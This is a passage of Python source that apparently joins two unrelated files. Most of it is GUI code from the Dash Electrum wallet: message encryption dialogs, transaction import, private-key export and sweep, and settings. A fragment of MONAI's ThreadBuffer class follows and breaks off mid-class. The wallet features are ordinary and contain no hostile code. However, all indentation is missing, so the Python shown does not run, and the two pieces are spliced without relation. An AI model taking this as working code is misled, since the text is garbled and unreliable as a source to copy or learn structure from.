b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_dash.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Dash Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_dash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a dash URI
if str(data).startswith("dash:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
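# Export format: the CSV variant writes an "address,private_key" header row
# followed by one row per address (addresses padded to 34 characters), while
# the fallback writes the same mapping as indented JSON.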
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dash.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Static: a fixed fee rate (fee per kB) is used.'),
_('ETA: the fee rate is based on average confirmation time estimates.'),
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
# only Static and ETA are offered here; mempool-based estimation maps to ETA
fee_type_combo.setCurrentIndex(1 if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 DASH = 1000 mDASH. 1 mDASH = 1000 uDASH. 1 uDASH = 100 duffs.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
show_dip2_cb = QCheckBox(_('Show DIP2 tx type in wallet history:'))
show_dip2_cb.setChecked(self.config.get('show_dip2_tx_type', False))
def on_dip2_state_changed(x):
show_dip2 = (x == Qt.Checked)
self.config.set_key('show_dip2_tx_type', show_dip2, True)
self.history_model.refresh('on_dip2')
show_dip2_cb.stateChanged.connect(on_dip2_state_changed)
gui_widgets.append((show_dip2_cb, None))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 duffs might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Dash Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.wallet.protx_manager.clean_up()
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_masternode_dialog(self):
d = MasternodeDialog(self.masternode_manager, self)
d.exec_()
def proposals_changed(self):
"""Callback for when proposals change."""
if not self.masternode_manager:
return
self.update_proposals_tab()
|
thread_buffer.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from queue import Empty, Full, Queue
from threading import Thread
from monai.data import DataLoader, Dataset
class ThreadBuffer:
"""
Iterates over values from self.src in a separate thread and yields them in the current thread. This allows values
to be queued up asynchronously. The internal thread will continue running so long as the source has values or until
the stop() method is called.
One issue raised by using a thread in this way is that the source object is iterated over for the lifetime of the
thread, so another attempt to iterate over it before the thread has finished will raise an exception or yield
unexpected results. To ensure the thread releases the iteration and is cleaned up properly, the stop() method must
be called, which will join with the thread.
Args:
src: Source data iterable
buffer_size: Number of items to buffer from the source
timeout: Time to wait for an item from the buffer, or to wait while the buffer is full when adding items
"""
def __init__(self, src, buffer_size: int = 1, timeout: float = 0.01):
self.src = src
self.buffer_size = buffer_size
self.timeout = timeout
self.buffer: Queue = Queue(self.buffer_size)
self.gen_thread = None
self.is_running = False
def enqueue_values(self):
for src_val in self.src:
while self.is_running:
try:
self.buffer.put(src_val, timeout=self.timeout)
except Full:
pass # try to add the item again
else:
break # successfully added the item, quit trying
else: # quit the thread cleanly when requested to stop
break
